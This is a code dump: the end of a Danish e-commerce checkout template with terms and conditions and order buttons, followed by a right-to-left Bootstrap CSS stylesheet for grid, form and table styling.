anden m&aring;de udviser en adf&aelig;rd, der er up&aring;lidelig, i strid med lovgivningen, eller som p&aring; anden m&aring;de er en misligholdelse af s&aelig;lgernes eller medlemmernes forpligtelser i henhold til denne aftale, er eCommerce Demo ikke ansvarlig herfor. </p> </li> </ol> </li> <li> <strong>Ansvar og almindelige betingelser</strong> <p> eCommerce Demo er ikke erstatningsansvarlig over for k&oslash;ber eller nogen tredjepart for indirekte skader eller f&oslash;lgeskader, for tab af data, avance, indt&aelig;gter eller forretninger, hvordan det end m&aring;tte v&aelig;re for&aring;rsaget (hvad enten som f&oslash;lge af uagtsomhed eller misligholdelse af n&aelig;rv&aelig;rende aftale eller p&aring; anden vis), selv om et s&aring;dant tab eller en s&aring;dan skade kunne forudses af eCommerce Demo, eller eCommerce Demo var gjort opm&aelig;rksom p&aring;, at muligheden derfor forel&aring;. </p> <ol type="a"> <li> <strong>Force majeure</strong> <p> eCommerce Demo er ikke ansvarlig for manglende overholdelse af sine forpligtelser i henhold til n&aelig;rv&aelig;rende aftale,&nbsp;der skyldes faktorer, som eCommerce Demo ikke er herre over. </p> </li> <li> <strong>&AElig;ndringer i n&aelig;rv&aelig;rende aftale</strong> <p> eCommerce Demo forbeholder sig ret til at foretage &aelig;ndringer i n&aelig;rv&aelig;rende betingelser. eCommerce Demo forpligter sig til i forbindelse hermed at informere medlemmerne om s&aring;danne &aelig;ndringer. </p> </li> </ol> </li> </ol> <dl> <dd> <input type="checkbox" id="EcomOrderCustomerAccepted" name="EcomOrderCustomerAccepted" value="1" /> </dd> <dt>Ja, jeg har forstået handels- og leveringsbetingelser</dt> </dl> </fieldset> </fieldset> <input type="submit" name="<!--@CartV2.PreviousStepButtonName-->" id="<!--@CartV2.PreviousStepButtonName-->" value="<!--@Translate(back, "Back")-->" class="submitter" /> <input type="submit" name="<!--@CartV2.CurrentStepButtonName-->" id="<!--@CartV2.CurrentStepButtonName-->" value="<!--@Translate(update, "Update")-->" class="submitter" /> <input type="submit" name="<!--@CartV2.NextStepButtonName-->" id="<!--@CartV2.NextStepButtonName-->" value="<!--@Translate(createorder, "Create Order")-->" class="submitter" /> </form>
templates/ja_mero/css/rtl/light/bootstrap.css
hscomp2002/edmansport
.clearfix { *zoom: 1; } .clearfix:before, .clearfix:after { display: table; content: ""; line-height: 0; } .clearfix:after { clear: both; } .hide-text { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .input-block-level { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display: block; } audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; } audio:not([controls]) { display: none; } html { font-size: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } a:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } a:hover, a:active { outline: 0; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } img { max-width: 100%; width: auto \9; height: auto; vertical-align: middle; border: 0; -ms-interpolation-mode: bicubic; } #map_canvas img, .google-maps img { max-width: none; } button, input, select, textarea { margin: 0; font-size: 100%; vertical-align: middle; } button, input { *overflow: visible; line-height: normal; } button::-moz-focus-inner, input::-moz-focus-inner { padding: 0; border: 0; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } label, select, button, input[type="button"], input[type="reset"], input[type="submit"], input[type="radio"], input[type="checkbox"] { cursor: pointer; } input[type="search"] { -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; -webkit-appearance: textfield; } input[type="search"]::-webkit-search-decoration, input[type="search"]::-webkit-search-cancel-button { -webkit-appearance: none; } textarea { overflow: auto; vertical-align: top; } @media print { * { text-shadow: none !important; color: #000 !important; background: transparent !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } .ir a:after, a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } @page { margin: 0.5cm; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } } .row { margin-right: -10px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: right; min-height: 1px; margin-right: 10px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 938px; } .span12 { width: 938px; } .span11 { width: 859px; } .span10 { width: 780px; } .span9 { width: 701px; } .span8 { width: 622px; } .span7 { width: 543px; } .span6 { width: 464px; } .span5 { width: 385px; } .span4 { width: 306px; } .span3 { width: 227px; } .span2 { width: 148px; } .span1 { width: 69px; } .offset12 { margin-right: 958px; } .offset11 { margin-right: 879px; } .offset10 { margin-right: 800px; } .offset9 { margin-right: 721px; } .offset8 { margin-right: 642px; } .offset7 { margin-right: 563px; } .offset6 { margin-right: 484px; } .offset5 { margin-right: 405px; } .offset4 { margin-right: 326px; } .offset3 { margin-right: 247px; } .offset2 { margin-right: 168px; } .offset1 { margin-right: 89px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: right; margin-right: 1.0660980810235%; *margin-right: 1.0127931769723%; } .row-fluid [class*="span"]:first-child { margin-right: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-right: 1.0660980810235%; } .row-fluid .span12 { width: 100%; *width: 99.946695095949%; } .row-fluid .span11 { width: 91.577825159915%; *width: 91.524520255864%; } .row-fluid .span10 { width: 83.155650319829%; *width: 83.102345415778%; } .row-fluid .span9 { width: 74.733475479744%; *width: 74.680170575693%; } .row-fluid .span8 { width: 66.311300639659%; *width: 66.257995735608%; } .row-fluid .span7 { width: 57.889125799574%; *width: 57.835820895522%; } .row-fluid .span6 { width: 49.466950959488%; *width: 49.413646055437%; } .row-fluid .span5 { width: 41.044776119403%; *width: 40.991471215352%; } .row-fluid .span4 { width: 32.622601279318%; *width: 32.569296375267%; } .row-fluid .span3 { width: 24.200426439232%; *width: 24.147121535181%; } .row-fluid .span2 { width: 15.778251599147%; *width: 15.724946695096%; } .row-fluid .span1 { width: 7.3560767590618%; *width: 7.3027718550107%; } .row-fluid .offset12 { margin-right: 102.13219616205%; *margin-right: 102.02558635394%; } .row-fluid .offset12:first-child { margin-right: 101.06609808102%; *margin-right: 100.95948827292%; } .row-fluid .offset11 { margin-right: 93.710021321962%; *margin-right: 93.603411513859%; } .row-fluid .offset11:first-child { margin-right: 92.643923240938%; *margin-right: 92.537313432836%; } .row-fluid .offset10 { margin-right: 85.287846481876%; *margin-right: 85.181236673774%; } .row-fluid .offset10:first-child { margin-right: 84.221748400853%; *margin-right: 84.115138592751%; } .row-fluid .offset9 { margin-right: 76.865671641791%; *margin-right: 76.759061833689%; } .row-fluid .offset9:first-child { margin-right: 75.799573560768%; *margin-right: 75.692963752665%; } .row-fluid .offset8 { margin-right: 68.443496801706%; *margin-right: 68.336886993603%; } .row-fluid .offset8:first-child { margin-right: 67.377398720682%; *margin-right: 67.27078891258%; } .row-fluid .offset7 { margin-right: 60.02132196162%; *margin-right: 59.914712153518%; } .row-fluid .offset7:first-child { margin-right: 58.955223880597%; *margin-right: 58.848614072495%; } .row-fluid .offset6 { margin-right: 51.599147121535%; *margin-right: 51.492537313433%; } .row-fluid .offset6:first-child { margin-right: 50.533049040512%; *margin-right: 50.426439232409%; } .row-fluid .offset5 { margin-right: 43.17697228145%; *margin-right: 43.070362473348%; } .row-fluid .offset5:first-child { margin-right: 42.110874200426%; *margin-right: 42.004264392324%; } .row-fluid .offset4 { margin-right: 34.754797441365%; *margin-right: 34.648187633262%; } .row-fluid .offset4:first-child { margin-right: 33.688699360341%; *margin-right: 33.582089552239%; } .row-fluid .offset3 { margin-right: 26.332622601279%; *margin-right: 26.226012793177%; } .row-fluid .offset3:first-child { margin-right: 25.266524520256%; *margin-right: 25.159914712154%; } .row-fluid .offset2 { margin-right: 17.910447761194%; *margin-right: 17.803837953092%; } .row-fluid .offset2:first-child { margin-right: 16.844349680171%; *margin-right: 16.737739872068%; } .row-fluid .offset1 { margin-right: 9.4882729211087%; *margin-right: 9.3816631130064%; } .row-fluid .offset1:first-child { margin-right: 8.4221748400853%; *margin-right: 8.3155650319829%; } [class*="span"].hide, .row-fluid [class*="span"].hide { display: none; } [class*="span"].pull-right, .row-fluid [class*="span"].pull-right { float: left; } .container { margin-left: auto; margin-right: auto; *zoom: 1; } .container:before, .container:after { display: table; content: ""; line-height: 0; } .container:after { clear: both; } .container-fluid { padding-left: 10px; padding-right: 10px; *zoom: 1; } .container-fluid:before, .container-fluid:after { display: table; content: ""; line-height: 0; } .container-fluid:after { clear: both; } code, pre { padding: 0 3px 2px; font-family: monospace; font-size: 11px; color: #444; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } code { padding: 2px 4px; color: #d14; background-color: #f7f7f9; border: 1px solid #e1e1e8; white-space: nowrap; } pre { display: block; padding: 9.5px; margin: 0 0 10px; font-size: 12px; line-height: 20px; word-break: break-all; word-wrap: break-word; white-space: pre; white-space: pre-wrap; background-color: #f5f5f5; border: 1px solid #ccc; border: 1px solid rgba(0,0,0,0.15); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } pre.prettyprint { margin-bottom: 20px; } pre code { padding: 0; color: inherit; white-space: pre; white-space: pre-wrap; background-color: transparent; border: 0; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } form { margin: 0 0 20px; } fieldset { padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; padding: 0; margin-bottom: 20px; font-size: 19.5px; line-height: 40px; color: #444; border: 0; border-bottom: 1px solid #e5e5e5; } legend small { font-size: 15px; color: #999; } label, input, button, select, textarea { font-size: 13px; font-weight: normal; line-height: 20px; } input, button, select, textarea { font-family: 'open_sansregular', sans-serif; } label { display: block; margin-bottom: 5px; } select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input { display: inline-block; height: 20px; padding: 4px 6px; margin-bottom: 10px; font-size: 13px; line-height: 20px; color: #666; -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; vertical-align: middle; } input, textarea, .uneditable-input { width: 206px; } textarea { height: auto; } textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input { background-color: #fff; border: 1px solid #ccc; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -webkit-transition: border linear .2s, box-shadow linear .2s; -moz-transition: border linear .2s, box-shadow linear .2s; -o-transition: border linear .2s, box-shadow linear .2s; transition: border linear .2s, box-shadow linear .2s; } textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus { border-color: rgba(82,168,236,0.8); outline: 0; outline: thin dotted \9; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6); box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6); } input[type="radio"], input[type="checkbox"] { margin: 4px 0 0; *margin-top: 0; margin-top: 1px \9; line-height: normal; } input[type="file"], input[type="image"], input[type="submit"], input[type="reset"], input[type="button"], input[type="radio"], input[type="checkbox"] { width: auto; } select, input[type="file"] { height: 30px; *margin-top: 4px; line-height: 30px; } select { width: 220px; border: 1px solid #ccc; background-color: #fff; } select[multiple], select[size] { height: auto; } select:focus, input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .uneditable-input, .uneditable-textarea { color: #999; background-color: #fcfcfc; border-color: #ccc; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025); box-shadow: inset 0 1px 2px rgba(0,0,0,0.025); cursor: not-allowed; } .uneditable-input { overflow: hidden; white-space: nowrap; } .uneditable-textarea { width: auto; height: auto; } input:-moz-placeholder, textarea:-moz-placeholder { color: #999; } input:-ms-input-placeholder, textarea:-ms-input-placeholder { color: #999; } input::-webkit-input-placeholder, textarea::-webkit-input-placeholder { color: #999; } .radio, .checkbox { min-height: 20px; padding-right: 20px; } .radio input[type="radio"], .checkbox input[type="checkbox"] { float: right; margin-right: -20px; } .controls > .radio:first-child, .controls > .checkbox:first-child { padding-top: 5px; } .radio.inline, .checkbox.inline { display: inline-block; padding-top: 5px; margin-bottom: 0; vertical-align: middle; } .radio.inline + .radio.inline, .checkbox.inline + .checkbox.inline { margin-right: 10px; } .input-mini { width: 60px; } .input-small { width: 90px; } .input-medium { width: 150px; } .input-large { width: 210px; } .input-xlarge { width: 270px; } .input-xxlarge { width: 530px; } input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input[class*="span"], .row-fluid input[class*="span"], .row-fluid select[class*="span"], .row-fluid textarea[class*="span"], .row-fluid .uneditable-input[class*="span"] { float: none; margin-right: 0; } .input-append input[class*="span"], .input-append .uneditable-input[class*="span"], .input-prepend input[class*="span"], .input-prepend .uneditable-input[class*="span"], .row-fluid input[class*="span"], .row-fluid select[class*="span"], .row-fluid textarea[class*="span"], .row-fluid .uneditable-input[class*="span"], .row-fluid .input-prepend [class*="span"], .row-fluid .input-append [class*="span"] { display: inline-block; } input, textarea, .uneditable-input { margin-right: 0; } .controls-row [class*="span"] + [class*="span"] { margin-right: 10px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 924px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 845px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 766px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 687px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 608px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 529px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 450px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 371px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 292px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 213px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 134px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 55px; } .controls-row { *zoom: 1; } .controls-row:before, .controls-row:after { display: table; content: ""; line-height: 0; } .controls-row:after { clear: both; } .controls-row [class*="span"], .row-fluid .controls-row [class*="span"] { float: right; } .controls-row .checkbox[class*="span"], .controls-row .radio[class*="span"] { padding-top: 5px; } input[disabled], select[disabled], textarea[disabled], input[readonly], select[readonly], textarea[readonly] { cursor: not-allowed; background-color: #eee; } input[type="radio"][disabled], input[type="checkbox"][disabled], input[type="radio"][readonly], input[type="checkbox"][readonly] { background-color: transparent; } .control-group.warning .control-label, .control-group.warning .help-block, .control-group.warning .help-inline { color: #c09853; } .control-group.warning .checkbox, .control-group.warning .radio, .control-group.warning input, .control-group.warning select, .control-group.warning textarea { color: #c09853; } .control-group.warning input, .control-group.warning select, .control-group.warning textarea { border-color: #c09853; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); } .control-group.warning input:focus, .control-group.warning select:focus, .control-group.warning textarea:focus { border-color: #a47e3c; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e; -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e; box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e; } .control-group.warning .input-prepend .add-on, .control-group.warning .input-append .add-on { color: #c09853; background-color: #fcf8e3; border-color: #c09853; } .control-group.error .control-label, .control-group.error .help-block, .control-group.error .help-inline { color: #b94a48; } .control-group.error .checkbox, .control-group.error .radio, .control-group.error input, .control-group.error select, .control-group.error textarea { color: #b94a48; } .control-group.error input, .control-group.error select, .control-group.error textarea { border-color: #b94a48; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); } .control-group.error input:focus, .control-group.error select:focus, .control-group.error textarea:focus { border-color: #953b39; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392; -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392; box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392; } .control-group.error .input-prepend .add-on, .control-group.error .input-append .add-on { color: #b94a48; background-color: #f2dede; border-color: #b94a48; } .control-group.success .control-label, .control-group.success .help-block, .control-group.success .help-inline { color: #468847; } .control-group.success .checkbox, .control-group.success .radio, .control-group.success input, .control-group.success select, .control-group.success textarea { color: #468847; } .control-group.success input, .control-group.success select, .control-group.success textarea { border-color: #468847; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); } .control-group.success input:focus, .control-group.success select:focus, .control-group.success textarea:focus { border-color: #356635; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b; -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b; box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b; } .control-group.success .input-prepend .add-on, .control-group.success .input-append .add-on { color: #468847; background-color: #dff0d8; border-color: #468847; } .control-group.info .control-label, .control-group.info .help-block, .control-group.info .help-inline { color: #3a87ad; } .control-group.info .checkbox, .control-group.info .radio, .control-group.info input, .control-group.info select, .control-group.info textarea { color: #3a87ad; } .control-group.info input, .control-group.info select, .control-group.info textarea { border-color: #3a87ad; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); } .control-group.info input:focus, .control-group.info select:focus, .control-group.info textarea:focus { border-color: #2d6987; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3; -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3; box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3; } .control-group.info .input-prepend .add-on, .control-group.info .input-append .add-on { color: #3a87ad; background-color: #d9edf7; border-color: #3a87ad; } input:focus:invalid, textarea:focus:invalid, select:focus:invalid { color: #b94a48; border-color: #ee5f5b; } input:focus:invalid:focus, textarea:focus:invalid:focus, select:focus:invalid:focus { border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7; } .form-actions { padding: 19px 20px 20px; margin-top: 20px; margin-bottom: 20px; background-color: #f5f5f5; border-top: 1px solid #e5e5e5; *zoom: 1; } .form-actions:before, .form-actions:after { display: table; content: ""; line-height: 0; } .form-actions:after { clear: both; } .help-block, .help-inline { color: #6a6a6a; } .help-block { display: block; margin-bottom: 10px; } .help-inline { display: inline-block; *display: inline; *zoom: 1; vertical-align: middle; padding-right: 5px; } .input-append, .input-prepend { display: inline-block; margin-bottom: 10px; vertical-align: middle; font-size: 0; white-space: nowrap; } .input-append input, .input-append select, .input-append .uneditable-input, .input-append .dropdown-menu, .input-append .popover, .input-prepend input, .input-prepend select, .input-prepend .uneditable-input, .input-prepend .dropdown-menu, .input-prepend .popover { font-size: 13px; } .input-append input, .input-append select, .input-append .uneditable-input, .input-prepend input, .input-prepend select, .input-prepend .uneditable-input { position: relative; margin-bottom: 0; *margin-right: 0; vertical-align: top; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; } .input-append input:focus, .input-append select:focus, .input-append .uneditable-input:focus, .input-prepend input:focus, .input-prepend select:focus, .input-prepend .uneditable-input:focus { z-index: 2; } .input-append .add-on, .input-prepend .add-on { display: inline-block; width: auto; height: 20px; min-width: 16px; padding: 4px 5px; font-size: 13px; font-weight: normal; line-height: 20px; text-align: center; text-shadow: 0 1px 0 #fff; background-color: #eee; border: 1px solid #ccc; } .input-append .add-on, .input-append .btn, .input-append .btn-group > .dropdown-toggle, .input-prepend .add-on, .input-prepend .btn, .input-prepend .btn-group > .dropdown-toggle { vertical-align: top; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .input-append .active, .input-prepend .active { background-color: #cbe792; border-color: #88b828; } .input-prepend .add-on, .input-prepend .btn { margin-left: -1px; } .input-prepend .add-on:first-child, .input-prepend .btn:first-child { -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; } .input-append input, .input-append select, .input-append .uneditable-input { -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; } .input-append input + .btn-group .btn:last-child, .input-append select + .btn-group .btn:last-child, .input-append .uneditable-input + .btn-group .btn:last-child { -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; } .input-append .add-on, .input-append .btn, .input-append .btn-group { margin-right: -1px; } .input-append .add-on:last-child, .input-append .btn:last-child, .input-append .btn-group:last-child > .dropdown-toggle { -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; } .input-prepend.input-append input, .input-prepend.input-append select, .input-prepend.input-append .uneditable-input { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .input-prepend.input-append input + .btn-group .btn, .input-prepend.input-append select + .btn-group .btn, .input-prepend.input-append .uneditable-input + .btn-group .btn { -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; } .input-prepend.input-append .add-on:first-child, .input-prepend.input-append .btn:first-child { margin-left: -1px; -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; -webkit-border-radius: 0 0px 0px 0; -moz-border-radius: 0 0px 0px 0; border-radius: 0 0px 0px 0; } .input-prepend.input-append .add-on:last-child, .input-prepend.input-append .btn:last-child { margin-right: -1px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; -webkit-border-radius: 0px 0 0 0px; -moz-border-radius: 0px 0 0 0px; border-radius: 0px 0 0 0px; } .input-prepend.input-append .btn-group:first-child { margin-right: 0; } input.search-query { padding-left: 14px; padding-left: 4px \9; padding-right: 14px; padding-right: 4px \9; margin-bottom: 0; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .form-search .input-append .search-query, .form-search .input-prepend .search-query { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .form-search .input-append .search-query { -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; } .form-search .input-append .btn { -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; } .form-search .input-prepend .search-query { -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; } .form-search .input-prepend .btn { -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; } .form-search input, .form-search textarea, .form-search select, .form-search .help-inline, .form-search .uneditable-input, .form-search .input-prepend, .form-search .input-append, .form-inline input, .form-inline textarea, .form-inline select, .form-inline .help-inline, .form-inline .uneditable-input, .form-inline .input-prepend, .form-inline .input-append, .form-horizontal input, .form-horizontal textarea, .form-horizontal select, .form-horizontal .help-inline, .form-horizontal .uneditable-input, .form-horizontal .input-prepend, .form-horizontal .input-append { display: inline-block; *display: inline; *zoom: 1; margin-bottom: 0; vertical-align: middle; } .form-search .hide, .form-inline .hide, .form-horizontal .hide { display: none; } .form-search label, .form-inline label, .form-search .btn-group, .form-inline .btn-group { display: inline-block; } .form-search .input-append, .form-inline .input-append, .form-search .input-prepend, .form-inline .input-prepend { margin-bottom: 0; } .form-search .radio, .form-search .checkbox, .form-inline .radio, .form-inline .checkbox { padding-right: 0; margin-bottom: 0; vertical-align: middle; } .form-search .radio input[type="radio"], .form-search .checkbox input[type="checkbox"], .form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] { float: right; margin-left: 3px; margin-right: 0; } .control-group { margin-bottom: 10px; } legend + .control-group { margin-top: 20px; -webkit-margin-top-collapse: separate; } .form-horizontal .control-group { margin-bottom: 20px; *zoom: 1; } .form-horizontal .control-group:before, .form-horizontal .control-group:after { display: table; content: ""; line-height: 0; } .form-horizontal .control-group:after { clear: both; } .form-horizontal .control-label { float: right; width: 160px; padding-top: 5px; text-align: left; } .form-horizontal .controls { *display: inline-block; *padding-right: 20px; margin-right: 180px; *margin-right: 0; } .form-horizontal .controls:first-child { *padding-right: 180px; } .form-horizontal .help-block { margin-bottom: 0; } .form-horizontal input + .help-block, .form-horizontal select + .help-block, .form-horizontal textarea + .help-block, .form-horizontal .uneditable-input + .help-block, .form-horizontal .input-prepend + .help-block, .form-horizontal .input-append + .help-block { margin-top: 10px; } .form-horizontal .form-actions { padding-right: 180px; } table { max-width: 100%; background-color: transparent; border-collapse: collapse; border-spacing: 0; } .table { width: 100%; margin-bottom: 20px; } .table th, .table td { padding: 8px; line-height: 20px; text-align: right; vertical-align: top; border-top: 1px solid #ddd; } .table th { font-weight: bold; } .table thead th { vertical-align: bottom; } .table caption + thead tr:first-child th, .table caption + thead tr:first-child td, .table colgroup + thead tr:first-child th, .table colgroup + thead tr:first-child td, .table thead:first-child tr:first-child th, .table thead:first-child tr:first-child td { border-top: 0; } .table tbody + tbody { border-top: 2px solid #ddd; } .table .table { background-color: #F5F5F5; } .table-condensed th, .table-condensed td { padding: 4px 5px; } .table-bordered { border: 1px solid #ddd; border-collapse: separate; *border-collapse: collapse; border-right: 0; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .table-bordered th, .table-bordered td { border-right: 1px solid #ddd; } .table-bordered caption + thead tr:first-child th, .table-bordered caption + tbody tr:first-child th, .table-bordered caption + tbody tr:first-child td, .table-bordered colgroup + thead tr:first-child th, .table-bordered colgroup + tbody tr:first-child th, .table-bordered colgroup + tbody tr:first-child td, .table-bordered thead:first-child tr:first-child th, .table-bordered tbody:first-child tr:first-child th, .table-bordered tbody:first-child tr:first-child td { border-top: 0; } .table-bordered thead:first-child tr:first-child > th:first-child, .table-bordered tbody:first-child tr:first-child > td:first-child, .table-bordered tbody:first-child tr:first-child > th:first-child { 